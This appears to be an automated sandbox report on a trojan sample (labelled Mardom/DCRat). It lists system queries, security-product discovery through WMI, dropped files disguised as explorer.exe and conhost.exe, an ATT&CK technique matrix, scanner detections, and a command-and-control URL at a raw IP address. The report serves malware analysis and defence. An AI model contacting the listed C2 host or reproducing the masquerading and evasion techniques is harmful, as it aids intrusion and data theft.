                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe VolumeInformation
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: CPNSQusnwC.exe, type: SAMPLE
                    Source: Yara match File source: 0.0.CPNSQusnwC.exe.9d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: CPNSQusnwC.exe PID: 1416, type: MEMORYSTR
                    Source: Yara match File source: C:\Recovery\conhost.exe, type: DROPPED
                    Source: Yara match File source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, type: DROPPED
                    Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, type: DROPPED

                    Remote Access Functionality

                    Source: Yara match File source: CPNSQusnwC.exe, type: SAMPLE
                    Source: Yara match File source: 0.0.CPNSQusnwC.exe.9d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: CPNSQusnwC.exe PID: 1416, type: MEMORYSTR
                    Source: Yara match File source: C:\Recovery\conhost.exe, type: DROPPED
                    Source: Yara match File source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, type: DROPPED
                    Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, type: DROPPED
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 1 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 1 Scripting | 111 Process Injection | 111 Masquerading | OS Credential Dumping | 33 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 251 Virtualization/Sandbox Evasion | Security Account Manager | 251 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 135 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    [Behavior Graph ID: 1574710, Sample: CPNSQusnwC.exe, Startdate: 13/12/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    CPNSQusnwC.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
                    CPNSQusnwC.exe | 100% | Avira | HEUR/AGEN.1309961 |
                    CPNSQusnwC.exe | 100% | Joe Sandbox ML | |
                    Source | Detection | Scanner | Label | Link
                    C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe | 100% | Avira | HEUR/AGEN.1309961 |
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe | 100% | Avira | HEUR/AGEN.1309961 |
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe | 100% | Avira | HEUR/AGEN.1309961 |
                    C:\Recovery\conhost.exe | 100% | Avira | HEUR/AGEN.1309961 |
                    C:\Recovery\conhost.exe | 100% | Avira | HEUR/AGEN.1309961 |
                    C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe | 100% | Joe Sandbox ML | |
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe | 100% | Joe Sandbox ML | |
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe | 100% | Joe Sandbox ML | |
                    C:\Recovery\conhost.exe | 100% | Joe Sandbox ML | |
                    C:\Recovery\conhost.exe | 100% | Joe Sandbox ML | |
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
                    C:\Recovery\conhost.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
                    C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
                    C:\Users\Public\Desktop\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\conhost.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom |
                    C:\Users\user\Desktop\AxLDtRxd.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                    C:\Users\user\Desktop\CxYvgXXc.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\DiqTAfIW.log | 25% | ReversingLabs | |
                    C:\Users\user\Desktop\DrOTkRbS.log | 3% | ReversingLabs | |
                    C:\Users\user\Desktop\ELylTcFa.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                    C:\Users\user\Desktop\FBkUkkGT.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                    C:\Users\user\Desktop\FZhLDyOY.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                    C:\Users\user\Desktop\FnPmnTXV.log | 21% | ReversingLabs | |
                    C:\Users\user\Desktop\GWITZydS.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\GzLcGkVO.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\HzZUtpuN.log | 29% | ReversingLabs | |
                    C:\Users\user\Desktop\LmdbigkC.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\QhesqMaw.log | 21% | ReversingLabs | |
                    C:\Users\user\Desktop\QwEjYoPD.log | 4% | ReversingLabs | |
                    C:\Users\user\Desktop\SSKIxalp.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\SVwsOfwt.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\TkfSyAEq.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                    C:\Users\user\Desktop\TmvagkQx.log | 25% | ReversingLabs | |
                    C:\Users\user\Desktop\TvSaQXjt.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\UJAAAsrr.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\UOyjNWIs.log | 12% | ReversingLabs | |
                    C:\Users\user\Desktop\UPlQSaAj.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\WJAzEWli.log | 4% | ReversingLabs | |
                    C:\Users\user\Desktop\aIOpvFFY.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                    C:\Users\user\Desktop\bqhiOmsd.log | 5% | ReversingLabs | |
                    C:\Users\user\Desktop\bvfQbQIf.log | 21% | ReversingLabs | |
                    C:\Users\user\Desktop\cSkqvYkZ.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\dGozhlgX.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\eJSyBaRc.log | 16% | ReversingLabs | |
                    C:\Users\user\Desktop\ejwQzjeb.log | 3% | ReversingLabs | |
                    C:\Users\user\Desktop\fJbhCUkS.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\gljzVSiX.log | 25% | ReversingLabs | |
                    C:\Users\user\Desktop\hovXJzGK.log | 5% | ReversingLabs | |
                    C:\Users\user\Desktop\jWOPcftP.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\liYyiBRH.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\nDhGzpaM.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\nTDOpObA.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\pxxplmMK.log | 25% | ReversingLabs | |
                    C:\Users\user\Desktop\qVqwKxgw.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\sUqvPban.log | 29% | ReversingLabs | |
                    C:\Users\user\Desktop\scaNtKAs.log | 25% | ReversingLabs | |
                    C:\Users\user\Desktop\tQeVfYwq.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\uNFeAYLl.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\uaPNCQpm.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\ufMwPuFo.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\vEieQmso.log | 16% | ReversingLabs | |
                    C:\Users\user\Desktop\wdeWzfMx.log | 21% | ReversingLabs | |
                    C:\Users\user\Desktop\xQsMWHQg.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\ySVMqwBm.log | 12% | ReversingLabs | |
                    C:\Users\user\Desktop\zJHvHEBf.log | 25% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php | 0% | Avira URL Cloud | safe |
                    No contacted domains info
                    Name | Malicious | Antivirus Detection | Reputation
                    http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php | true | Avira URL Cloud: safe | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://aka.ms/pscore68 | powershell.exe | false | | high
                    http://pesterbdd.com/images/Pester.png | powershell.exe | false | | high
                    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe | false | | high
